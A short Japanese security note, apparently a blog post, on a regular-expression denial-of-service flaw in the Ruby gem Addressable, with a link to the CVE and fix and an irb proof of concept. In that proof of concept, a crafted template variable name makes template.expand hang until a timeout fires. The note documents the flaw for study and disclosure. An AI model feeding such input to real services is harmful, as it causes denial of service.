cve.mitre.org

修正コミットはこれ。

github.com

PoC は次の通り。テンプレートで利用される変数名を外部から操作できる場合に発生する。
GHSA では High になっているが、このようなケースは少ないだろうと思う。

irb(main):032:0> template = Addressable::Template.new("http://example.com/{000000000000000000000000000000!}")
=> #<Addressable::Template:0x1e0 PATTERN:http://example.com/{000000000000000000000000000000!}>
irb(main):033:0> Timeout.timeout(10) { template.expand({}) }
Traceback (most recent call last):
        23: from /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/bin/irb:23:in `<main>'
        22: from /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/bin/irb:23:in `load'
        21: from /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/lib/ruby/gems/2.7.0/gems/irb-1.3.3/exe/irb:11:in `<top (required)>'
         4: from (irb):33:in `<main>'
         3: from /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/lib/ruby/gems/2.7.0/gems/timeout-0.1.1/lib/timeout.rb:112:in `timeout'
         2: from (irb):33:in `block in <main>'
         1: from /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/lib/ruby/gems/2.7.0/gems/addressable-2.7.0/lib/addressable/template.rb:595:in `expand'
/Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/lib/ruby/gems/2.7.0/gems/addressable-2.7.0/lib/addressable/template.rb:595:in `gsub!': execution expired (Timeout::Error)